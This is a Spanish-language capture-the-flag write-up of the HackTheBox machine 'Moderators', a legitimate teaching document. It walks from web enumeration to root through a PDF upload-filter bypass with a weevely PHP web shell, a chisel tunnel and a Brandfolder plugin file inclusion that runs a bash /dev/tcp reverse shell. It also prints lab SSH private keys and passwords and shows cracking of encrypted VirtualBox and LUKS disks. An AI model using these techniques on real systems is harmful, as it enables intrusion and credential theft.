Writeup Moderators HackTheBox

Resolución de la máquina Moderators de la plataforma de HackTheBox

Iniciamos escaneando los puertos de la máquina con nmap

❯ nmap 10.10.11.173
Nmap scan report for 10.10.11.173
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Buscando posibles contenidos en php podemos fuzzear y encontramos reports

❯ gobuster dir -u 10.10.11.173 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/cat/Language/php.txt -t 100
===============================================================
[+] Threads:                 100
[+] Url:                     http://10.10.11.173
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/SVNDigger/cat/Language/php.txt
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 11150]
/about.php            (Status: 200) [Size: 11539]
/reports.php          (Status: 302) [Size: 7888] [--> index.php]
/blog.php             (Status: 200) [Size: 13163]

Fuzzeando posibles argumentos de report encontramos varias combinaciones de numeros

❯ wfuzz -c -w /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt -u "http://10.10.11.173/reports.php?report=FUZZ" --hw 417 -t 100

Target: http://10.10.11.173/reports.php?report=FUZZ
Total requests: 10000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000002590:   200        274 L    523 W      9786 Ch     "2589"
000003479:   200        275 L    526 W      9831 Ch     "3478"
000004222:   200        273 L    523 W      9880 Ch     "4221"
000007613:   200        275 L    523 W      9790 Ch     "7612"
000008122:   200        273 L    522 W      9784 Ch     "8121"
000009799:   200        276 L    525 W      9887 Ch     "9798"

Después mirarlos encontramos uno que nos da /logs y un hash que parece md5

❯ curl -s "http://10.10.11.173/reports.php?report=9798" | grep Do -A8 | html2text
[+] Domain : bethebest101.uk.htb
[+] Vulnerability : Sensitive Information Disclosure
[+] Impact : 3.5/4.0
[+] Disclosed by : Karlos Young
[+] Disclosed on : 11/19/2021
[+] Posted on :
[+] Approved :
[+] Patched : NO
[+] LOGS : logs/e21cece511f43a5cb18d4932429915ed/

El md5 corresponde al numero del argumento correspondiente en este caso 9798

❯ echo -n 9798 | md5sum
e21cece511f43a5cb18d4932429915ed  -

También podemos ver un directorio uploads fuzzeando después de logs

❯ gobuster dir -u 10.10.11.173/logs/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 100
===============================================================
[+] Threads:                 100
[+] Url:                     http://10.10.11.173/logs/
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 315] [--> http://10.10.11.173/logs/css/]
/uploads              (Status: 301) [Size: 319] [--> http://10.10.11.173/logs/uploads/]

Encontrámos un logs.pdf en uno de esos hashes con el siguiente contenido

Mirando la ruta vemos que hay un campo donde podemos subir archivos pdf

Algunas funciones como system dan problemas asi que usaremos weevely para crear un php

❯ python3 weevely.py generate shell shell.pdf.php
Generated 'shell.pdf.php' with password 'shell' of 687 byte size.

Al subir solo admite pdfs tenemos que agregar unas etiquetas para pasar el filtro

Agregamos %PDF-1.5 y %%EOF además de modificar el Content-Type

De esta mánera el enviar podemos ver que se sube correctamente

Lo invocamos con weevely y obtenemos shell aunque recomiendo hacer una reverse shell

❯ python3 weevely.py http://10.10.11.173/logs/uploads/shell.pdf.php shell

[+] weevely 4.0.1
[+] Target: 10.10.11.173

weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@moderators:~/html/logs/uploads$ hostname -I
10.10.11.173 dead:beef::250:56ff:feb9:4a96
www-data@moderators:~/html/logs/uploads$

En puerto 8080 esta abierto asi que lo pasamos a local con chisel

❯ chisel server --reverse --port 8000
server: Reverse tunnelling enabled
server: Listening on http://0.0.0.0:8000
www-data@moderators:/dev/shm$ ./chisel client 10.10.14.10:8000 R:8080:127.0.0.1:8080 &
Connecting to ws://10.10.14.10:8000
Connected (Latency 12.495305ms)
www-data@moderators:/dev/shm$

Podemos aprovecharnos de el siguiente exploit para escalar a lexi y convertirnos en usuario

Empezamos crearndo un directorio en un lugar con permisos de escritura

www-data@moderators:~/html/logs/uploads$ mkdir user
www-data@moderators:~/html/logs/uploads$

En el creamos un archivo wp-load.php con una reverse shell en php

www-data@moderators:~/html/logs/uploads/user$ cat wp-load.php 
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.10/443 0>&1'"); ?>
www-data@moderators:~/html/logs/uploads/user$

Ahora basta con invocarlo aprovechando la vulnerabilidad y recibimos shell

❯ curl "http://localhost:8080/wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/user/"
❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.173
lexi@moderators:/opt/site.new/wp-content/plugins/brandfolder$ id
uid=1001(lexi) gid=1001(lexi) groups=1001(lexi),1002(moderators)
lexi@moderators:/opt/site.new/wp-content/plugins/brandfolder$ hostname -I
10.10.11.173 dead:beef::250:56ff:feb9:4a96 
lexi@moderators:/opt/site.new/wp-content/plugins/brandfolder$

Podemos ver la id_rsa del usuario asi que nos conectamos por ssh mas cómodo

lexi@moderators:~/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
❯ ssh lexi@10.10.11.173 -i id_rsa
lexi@moderators:~$ id
uid=1001(lexi) gid=1001(lexi) groups=1001(lexi),1002(moderators)
lexi@moderators:~$ hostname -I
10.10.11.173 dead:beef::250:56ff:feb9:4a96 
lexi@moderators:~$ cat user.txt 
5c3**************************268
lexi@moderators:~$

Ahora podemos ver el wp-config que contiene credenciales para mysql

lexi@moderators:/opt/site.new$ cat wp-config.php | grep DB
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpressuser' );
define( 'DB_PASSWORD', 'wordpresspassword123!!' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
define( 'DB_COLLATE', '' );
lexi@moderators:/opt/site.new$

Podemos generar una nueva contraseña para el wordpress y cambiarla desde mysql

lexi@moderators:~$ mysql -Dwordpress -uwordpressuser -p'wordpresspassword123!!'
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

MariaDB [wordpress]> UPDATE `wp_users` SET `user_pass` = '$P$BIsDcvvyUHRF.QKXlJzhA9.kgCsuxL/' WHERE user_login = 'admin';
Query OK, 1 row affected (0.003 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MariaDB [wordpress]>

De antes tenemos el 8080 en nuestro equipo, tenemos que agregar el dominio al localhost

❯ cat /etc/hosts | head -n1
127.0.0.1       localhost moderators.htb

Podemos acceder al wp-admin con la contraseña que hemos definido en la base de datos

Daremos un vistazo a el apartado Passwords por si hay alguna almacenada

Interesantemente john tiene guardada una id_rsa privada para conectarse por ssh

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Con esta id_rsa autorizada nos podemos conectar por ssh con el usuario john

❯ ssh john@10.10.11.173 -i id_rsa
john@moderators:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),1002(moderators)
john@moderators:~$ hostname -I
10.10.11.173 dead:beef::250:56ff:feb9:4a96 
john@moderators:~$

Hay un directorio el cual parece tener archivos de virtualbox

john@moderators:~/stuff/VBOX$ ls
2019-08-01.vbox  2019.vdi
john@moderators:~/stuff/VBOX$

Al archivo vbox hay que eliminar algunas cosas y modificar otras, finalmente quedaria algo asi

<?xml version="1.0"?>
<!--
** DO NOT EDIT THIS FILE.
** If you make changes to this file while any VirtualBox related application
** is running, your changes will be overwritten later, without taking effect.
** Use VBoxManage or the VirtualBox Manager GUI to make changes.
-->
<VirtualBox xmlns="http://www.virtualbox.org/" version="1.16-windows">
  <Machine uuid="{528b3540-b8be-4677-b43f-7f4969137747}" name="Moderator 1" OSType="Ubuntu_64" snapshotFolder="Snapshots" lastStateChange="2022-08-11T19:20:46Z">
    <MediaRegistry>
      <HardDisks>
        <HardDisk uuid="{12b147da-5b2d-471f-9e32-a32b1517ff4b}" location="./2019.vdi" format="VDI" type="Normal">
          <Property name="CRYPT/KeyId" value="Moderator 1"/>
          <Property name="CRYPT/KeyStore" value="U0NORQABQUVTLVhUUzI1Ni1QTEFJTjY0AAAAAAAAAAAAAAAAAABQQktERjItU0hB&#13;&#10;MjU2AAAAAAAAAAAAAAAAAAAAAAAAAEAAAADssBk3IXYOVlXkLWlDd8JCJ8ZUN8FC&#13;&#10;kVQY8Ovl9vXMMyAAAABu5KwY/KgMH20LHptIADnZJ6gRrgSFLm+s6eJEaJx+ziBO&#13;&#10;AAByl/CysecMVxqIA8QKkYqCcCT+RiMz7PJCBnJ+/oGFI2DqAABAAAAAKGFz0b7a&#13;&#10;q8cFTdpSCXUCgvz+yFWcIi1i2jYow1/CS0CEEATdrtbMxzzANgoenuThAceBWSUQ&#13;&#10;FqJ4CioY8Qm3BA=="/>
        </HardDisk>
      </HardDisks>
    </MediaRegistry>
    <ExtraData>
      <ExtraDataItem name="GUI/LastCloseAction" value="PowerOff"/>
      <ExtraDataItem name="GUI/LastGuestSizeHint" value="2560,1335"/>
      <ExtraDataItem name="GUI/LastNormalWindowPosition" value="0,23,640,480,max"/>
    </ExtraData>
    <Hardware>
      <CPU count="2">
        <PAE enabled="false"/>
        <LongMode enabled="true"/>
        <X2APIC enabled="true"/>
        <HardwareVirtExLargePages enabled="true"/>
      </CPU>
      <Memory RAMSize="2048"/>
      <HID Pointing="USBTablet"/>
      <Boot>
        <Order position="1" device="Floppy"/>
        <Order position="2" device="HardDisk"/>
        <Order position="3" device="DVD"/>
        <Order position="4" device="None"/>
      </Boot>
      <Display controller="VMSVGA" VRAMSize="128" accelerate3D="true"/>
      <BIOS>
        <IOAPIC enabled="true"/>
        <SmbiosUuidLittleEndian enabled="true"/>
      </BIOS>
      <USB>
        <Controllers>
          <Controller name="OHCI" type="OHCI"/>
          <Controller name="EHCI" type="EHCI"/>
        </Controllers>
      </USB>
      <Network>
        <Adapter slot="0" enabled="true" MACAddress="08002799F7EC" type="82540EM">
          <NAT/>
        </Adapter>
      </Network>
      <AudioAdapter codec="AD1980" driver="DirectSound" enabled="true" enabledIn="false"/>
      <RTC localOrUTC="UTC"/>
      <Clipboard/>
      <GuestProperties>
        <GuestProperty name="/VirtualBox/GuestAdd/HostVerLastChecked" value="6.1.34" timestamp="1657117437893678100" flags=""/>
        <GuestProperty name="/VirtualBox/GuestAdd/Revision" value="150636" timestamp="1657117380950198406" flags=""/>
        <GuestProperty name="/VirtualBox/GuestAdd/Version" value="6.1.34" timestamp="1657117380950198404" flags=""/>
        <GuestProperty name="/VirtualBox/GuestAdd/VersionExt" value="6.1.34" timestamp="1657117380950198405" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/0/MAC" value="08002799F7EC" timestamp="1657117380952151105" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/0/Name" value="enp0s3" timestamp="1657117380952151107" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/0/Status" value="Up" timestamp="1657117380952151106" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/0/V4/Broadcast" value="10.0.2.255" timestamp="1657117380952151103" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/0/V4/IP" value="10.0.2.15" timestamp="1657117380952151102" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/0/V4/Netmask" value="255.255.255.0" timestamp="1657117380952151104" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/Count" value="1" timestamp="1657117646084736900" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/OS/Product" value="Linux" timestamp="1657117380950198400" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/OS/Release" value="5.15.0-40-generic" timestamp="1657117380950198401" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/OS/Version" value="#43-Ubuntu SMP Wed Jun 15 12:54:21 UTC 2022" timestamp="1657117380950198402" flags=""/> 
        <GuestProperty name="/VirtualBox/HostInfo/DekMissing" value="1" timestamp="1660245560293252500" flags="RDONLYGUEST"/>
        <GuestProperty name="/VirtualBox/HostInfo/GUI/LanguageID" value="es_ES" timestamp="1660245647071532000" flags=""/>
      </GuestProperties>
    </Hardware>
    <StorageControllers>
      <StorageController name="AHCI" type="AHCI" PortCount="3" useHostIOCache="false" Bootable="true" IDE0MasterEmulationPort="0" IDE0SlaveEmulationPort="1" IDE1MasterEmulationPort="2" IDE1SlaveEmulationPort="3">
        <AttachedDevice type="HardDisk" hotpluggable="false" port="0" device="0">
          <Image uuid="{12b147da-5b2d-471f-9e32-a32b1517ff4b}"/>
        </AttachedDevice>
      </StorageController>
    </StorageControllers>
    <VideoCapture options="vc_enabled=true,ac_enabled=true,ac_profile=med" fps="25"/>
  </Machine>
</VirtualBox>

El vdi tiene un cifrado podemos usar pyvboxdie-cracker para conseguir la contraseña

❯ python3 pyvboxdie-cracker.py -v 2019-08-01.vbox -d wordlist.txt
Starting pyvboxdie-cracker...

[*] Encrypted drive found :  F:/2019.vdi
[*] KeyStore information...
 Algorithm = AES-XTS256-PLAIN64
 Hash = PBKDF2-SHA256
 Final Hash = 5442057bc804a3a914607decea5574aa7038cdce0d498c7fc434afe8cd5b244f

[*] Starting bruteforce...
 51 password tested...

[*] Password Found = computer

Para lo que sigue recordar tener instalado el extension pack de virtualbox

Una vez instalamos ubuntu y agregamos el vdi hay que habilitar el cifrado que vimos antes

Al intentar montarlo en /dev/shm obtenemos un error de tipo crypto_LUKS

ubuntu@ubuntu:~$ sudo mount /dev/sda /dev/shm
mount: /dev/shm: unknown filesystem type 'crypto_LUKS'
ubuntu@ubuntu:~$

Podemos ayudarnos de una a herramienta para obtener la contraseña

ubuntu@ubuntu:~$ ./bruteforce-luks-static-linux-amd64 -f wordlist.txt /dev/sda
Password found: abc123
ubuntu@ubuntu:~$

Una vez montado encontraremos varios scripts, entre ellos distro_update.sh con una contraseña

echo ""
echo "Installing updates.."
passwd='$_THE_best_Sysadmin_Ever_'
echo $passwd|sudo apt-get update

echo "Upgrading..."
echo $passwd|sudo apt-get -y upgrade

Esta contraseña es la del usuario john, el cual tiene ALL a nivel de sudoers

john@moderators:~$ sudo -l
[sudo] password for john: $_THE_best_Sysadmin_Ever_
Matching Defaults entries for john on moderators:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/bin\:/bin

User john may run the following commands on moderators:
    (root) ALL
john@moderators:~$

Entonces simplemente hacemos sudo su y nos convertimos el root

john@moderators:~$ sudo su
root@moderators:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@moderators:/home/john# hostname -I
10.10.11.173 dead:beef::250:56ff:feb9:4a96
root@moderators:/home/john# cd /root
root@moderators:~# cat root.txt
c66**************************b24
root@moderators:~#

Página Principal